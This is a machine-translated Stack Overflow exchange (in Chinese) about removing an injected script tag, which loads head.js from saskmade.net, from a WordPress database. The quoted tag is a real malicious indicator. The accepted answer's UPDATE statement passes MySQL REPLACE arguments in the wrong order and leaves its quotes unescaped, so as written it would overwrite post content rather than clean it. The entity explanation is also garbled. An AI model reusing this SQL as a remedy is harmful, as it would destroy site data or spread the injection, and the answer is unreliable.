我正在尝试清理受感染站点的 wordpress 数据库。 我对 mysql 知之甚少,到目前为止,我一直在尝试几个结果不佳的选项。 我附上了一些显示问题的图片,这是最终出现在页面上的 html 代码:
title="<script src='https://saskmade.net/head.js?ver=2.0.0' type='text/javascript'></script>"
我失败的尝试包括点击删除按钮,所以整个网站当然会中断。
我确实有备份,所以我可以放心使用。 我知道应该有一个简单的“查找和替换”功能来从表中删除脚本,但我不确定我是否应该寻找其他任何东西,因为你可以看到 HTML 代码中实际上有更多的东西(#例如 039 部分,我只是想确保我正确删除了所有内容。 非常感谢您的帮助。
最佳答案
在 MySQL 中使用表更新的简单字符串替换调用如下所示:
UPDATE wp_posts
SET post_content = REPLACE(
'<script src='https://saskmade.net/head.js?ver=2.0.0' type='text/javascript'></script>',
'',
post_content
);
我不确定你的数据是否真的被编码了(我猜是的),否则使用 <而不是 <等
这不包括变体,而是 native MySQL 中“查找和替换”的最基本方法。它不包含空格和返回,但我认为您应该使用它。
更简单的方法
将在您最喜欢的文本编辑器中打开转储(我建议使用 Notepad++,因为它具有正则表达式搜索和替换功能),然后以手动方式浏览该文件。
关于mysql - 清除 MYSQL 数据库中注入(inject)的 javascript 引用,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/54151067/